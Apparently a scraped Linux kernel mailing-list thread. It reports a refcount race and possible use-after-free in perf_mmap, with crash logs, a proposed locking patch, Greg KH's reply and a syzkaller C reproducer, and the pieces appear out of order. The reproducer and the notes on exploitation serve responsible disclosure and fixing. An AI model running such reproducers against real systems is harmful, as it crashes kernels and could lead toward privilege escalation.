NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
On Sat, Jan 31, 2026 at 09:21:23PM +0800, 余昊铖 wrote: Can you turn this into a patch we can apply (properly sent, real name used, etc.) so that the maintainers can review it and apply it correctly? Also, be sure to send this to the correct people, I don't think that the ext4 developers care that much about perf :) thanks, greg k-h
{ "author": "Greg KH <gregkh@linuxfoundation.org>", "date": "Sun, 1 Feb 2026 09:18:40 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); 